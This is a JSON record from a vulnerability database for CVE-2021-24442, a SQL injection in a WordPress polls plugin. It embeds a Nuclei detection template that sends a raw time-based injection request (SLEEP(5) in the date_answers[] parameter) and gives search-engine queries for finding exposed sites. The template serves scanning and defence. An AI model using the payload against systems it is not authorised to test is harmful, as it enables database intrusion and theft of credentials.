{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-24442/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-24442/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-24442/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-24442/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-24442/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-24442"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-24442"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2021/CVE-2021-24442.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2021-24442\n\ninfo:\n  name: Wordpress Polls Widget < 1.5.3 - SQL Injection\n  author: ritikchaddha\n  severity: critical\n  description: |\n    The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks\n  impact: |\n    Unauthenticated attackers can execute SQL injection to manipulate database contents, potentially gaining unauthorized access to all WordPress data including user credentials.\n  remediation: Fixed in 1.5.3\n  reference:\n    - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-24442\n    - https://wordpress.org/plugins/polls-widget/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2021-24442\n    cwe-id: CWE-89\n    epss-score: 0.45996\n    epss-percentile: 0.98754\n    cpe: cpe:2.3:a:wpdevart:poll\\,_survey\\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: wpdevart\n    product: poll\\,_survey\\,_questionnaire_and_voting_system\n    framework: wordpress\n    shodan-query: http.html:/wp-content/plugins/polls-widget/\n    fofa-query: body=/wp-content/plugins/polls-widget/\n    publicwww-query: \"/wp-content/plugins/polls-widget/\"\n  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        @timeout: 25s\n        POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n        X-Forwarded-For: {{randstr}}\n\n        question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'duration>=5'\n          - 'status_code == 200'\n          - 'contains_all(body, \"{\\\"answer_name\", \"vote\\\":\")'\n        condition: and\n# digest: 490a00463044022017fca22f0dfb386cb5385125d46590b4687154e772f26a2ffadecdc082a2f5b50220378071316f4f9876f86161154b029e25005d4578f510a7c60ceee71401ee2e1c:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2021-24442"
}